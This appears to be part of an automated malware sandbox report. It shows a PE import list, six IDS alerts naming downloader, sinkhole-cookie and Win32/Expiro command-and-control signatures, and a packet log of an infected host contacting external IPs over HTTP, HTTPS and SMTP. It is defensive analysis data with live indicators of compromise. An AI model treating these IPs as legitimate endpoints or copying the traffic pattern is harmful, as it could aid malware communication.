                                                                                                                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                      EnglishGreat Britain
                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2024-11-28T18:26:53.571947+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                                                                                      2024-11-28T18:27:11.192599+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.749738TCP
                                                                                                                                                      2024-11-28T18:27:11.192599+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.749738TCP
                                                                                                                                                      2024-11-28T18:27:15.606360+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.749745TCP
                                                                                                                                                      2024-11-28T18:27:15.606360+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.749745TCP
                                                                                                                                                      2024-11-28T18:27:18.221469+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74975354.244.188.17780TCP
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Nov 28, 2024 18:26:50.884608030 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:26:51.004617929 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:51.004923105 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:26:51.005358934 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:26:51.125475883 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:51.255809069 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:51.255851984 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:51.255979061 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:51.264508009 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:51.264523029 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:52.575807095 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:52.575885057 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:52.660975933 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:52.661006927 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:52.661333084 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:52.712496996 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:52.825709105 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:52.867333889 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:52.891927958 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:52.964982986 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:26:53.085014105 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:53.172167063 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:53.172379017 CET44349702172.67.74.152192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:53.172435045 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:53.208930016 CET49702443192.168.2.7172.67.74.152
                                                                                                                                                      Nov 28, 2024 18:26:53.482584953 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:53.571947098 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:26:53.806446075 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:53.806483984 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:53.806540966 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:53.811336040 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:53.811350107 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:54.331792116 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:54.457113028 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:54.457226038 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:55.029834986 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.029911041 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:55.035623074 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:55.035639048 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.035955906 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.088288069 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:55.131330013 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.473886967 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.473951101 CET44349704172.67.177.134192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.474030972 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:55.503346920 CET49704443192.168.2.7172.67.177.134
                                                                                                                                                      Nov 28, 2024 18:26:55.780052900 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:55.786144972 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:55.906102896 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:56.198338032 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:56.200108051 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:56.320058107 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:56.612540960 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:56.612945080 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:56.739804983 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.038722038 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.038753033 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.038765907 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.038798094 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:57.115696907 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:57.236502886 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.528652906 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.532923937 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:57.653496981 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.946003914 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:57.948085070 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:58.068187952 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:58.360515118 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:58.361746073 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:58.482065916 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:58.783807039 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:58.794682026 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:58.921485901 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:59.213725090 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:59.217957020 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:59.337848902 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:59.885689974 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:59.885874033 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:26:59.972393036 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:26:59.973403931 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:00.006665945 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.298767090 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.299405098 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:00.299489021 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:00.299518108 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:00.299526930 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:00.419397116 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.419408083 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.419574976 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.419584990 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.804553986 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:00.868721962 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:00.914812088 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:01.039227009 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:01.331288099 CET5874970551.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:01.331815004 CET49705587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:01.332914114 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:01.460246086 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:01.460328102 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:02.725837946 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:02.729738951 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:02.849827051 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:03.173630953 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:03.188604116 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:03.308767080 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:03.599958897 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:03.600322008 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:03.720237970 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.021337032 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.021394968 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.021406889 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.021440983 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:04.023711920 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:04.143610001 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.436520100 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.437552929 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:04.557913065 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.848028898 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:04.848987103 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:04.969063997 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:05.259495974 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:05.260428905 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:05.380419970 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:05.675600052 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:05.675806999 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:05.806632996 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:06.096525908 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:06.096877098 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.220088005 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:06.515014887 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:06.515198946 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.650299072 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:06.940576077 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:06.941785097 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.941855907 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.941884041 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.941915989 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.941961050 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.941992044 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.942028999 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.942053080 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.942075014 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:06.942095995 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:07.063954115 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.063997030 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.064007998 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086756945 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086780071 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086790085 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086915970 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086925030 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086934090 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.086944103 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.443717003 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:07.499700069 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:27:09.491130114 CET4973880192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:09.611246109 CET804973854.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:09.611341000 CET4973880192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:09.634145021 CET4973880192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:09.634183884 CET4973880192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:09.761152029 CET804973854.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:09.761185884 CET804973854.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:11.072211981 CET804973854.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:11.072349072 CET804973854.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:11.072381020 CET4973880192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:11.072422028 CET4973880192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:11.192599058 CET804973854.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:13.239527941 CET4974580192.168.2.718.141.10.107
                                                                                                                                                      Nov 28, 2024 18:27:13.360052109 CET804974518.141.10.107192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:13.360140085 CET4974580192.168.2.718.141.10.107
                                                                                                                                                      Nov 28, 2024 18:27:13.360536098 CET4974580192.168.2.718.141.10.107
                                                                                                                                                      Nov 28, 2024 18:27:13.360536098 CET4974580192.168.2.718.141.10.107
                                                                                                                                                      Nov 28, 2024 18:27:13.480570078 CET804974518.141.10.107192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:13.480585098 CET804974518.141.10.107192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:15.435822964 CET804974518.141.10.107192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:15.435951948 CET804974518.141.10.107192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:15.436063051 CET4974580192.168.2.718.141.10.107
                                                                                                                                                      Nov 28, 2024 18:27:15.486243963 CET4974580192.168.2.718.141.10.107
                                                                                                                                                      Nov 28, 2024 18:27:15.606359959 CET804974518.141.10.107192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:16.691497087 CET4975380192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:16.812423944 CET804975354.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:16.812582970 CET4975380192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:16.823854923 CET4975380192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:16.823905945 CET4975380192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:16.944139004 CET804975354.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:16.944500923 CET804975354.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:18.221394062 CET804975354.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:18.221414089 CET804975354.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:18.221468925 CET4975380192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:18.221676111 CET4975380192.168.2.754.244.188.177
                                                                                                                                                      Nov 28, 2024 18:27:18.341612101 CET804975354.244.188.177192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:58.482831001 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:27:58.487284899 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:28:33.516822100 CET4970180192.168.2.7132.226.8.169
                                                                                                                                                      Nov 28, 2024 18:28:33.637237072 CET8049701132.226.8.169192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:34.104821920 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:34.225092888 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:34.515522957 CET5874971651.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:34.516227007 CET49716587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:40.815917969 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:40.936093092 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:40.936170101 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:42.193536043 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:42.193768978 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:42.315572977 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:42.603873968 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:42.604062080 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:42.724736929 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.015196085 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.015750885 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:43.137026072 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.432439089 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.432493925 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.432507038 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.432689905 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:43.437640905 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:43.557663918 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.849992990 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:43.856869936 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:43.976964951 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:44.266943932 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:44.267235041 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:44.388449907 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:44.678531885 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:44.678900957 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:44.799668074 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:45.109946966 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:45.110210896 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:45.230669022 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:45.520582914 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:45.520797014 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:45.641222000 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:45.941951990 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:45.945034027 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.065546989 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.355716944 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.358566046 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.358566046 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.358679056 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.358679056 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.360865116 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.478811979 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.478852034 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.478863001 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.478873968 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.478876114 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.478928089 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.480962992 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481003046 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481023073 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481050014 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481066942 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481087923 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481091022 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481128931 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481172085 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481220961 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481230974 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481271029 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481273890 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481287003 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481311083 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481327057 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.481367111 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.481406927 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.599529028 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.599543095 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.599586010 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.599622965 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.604439020 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.604509115 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.608592987 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.608706951 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.636545897 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.636600018 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.692487955 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.692564964 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.725351095 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.725415945 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.725441933 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.725496054 CET49930587192.168.2.751.195.88.199
                                                                                                                                                      Nov 28, 2024 18:28:46.725584984 CET5874993051.195.88.199192.168.2.7
                                                                                                                                                      Nov 28, 2024 18:28:46.725636959 CET49930587192.168.2.751.195.88.199
